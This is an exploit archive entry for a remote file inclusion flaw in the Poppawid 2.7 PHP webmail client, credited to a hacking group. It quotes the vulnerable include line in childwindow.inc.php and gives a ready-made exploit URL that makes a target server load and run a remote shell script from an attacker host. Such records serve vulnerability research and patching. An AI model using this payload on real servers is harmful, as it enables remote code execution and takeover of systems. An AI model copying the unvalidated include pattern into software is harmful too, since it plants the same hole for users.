Poppawid 2.7 - 'form' Remote File Inclusion

EDB-ID:

4481

Author:

0in

Type:

webapps

Platform:

PHP

Published:

2007-10-02

#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?

# milw0rm.com [2007-10-02]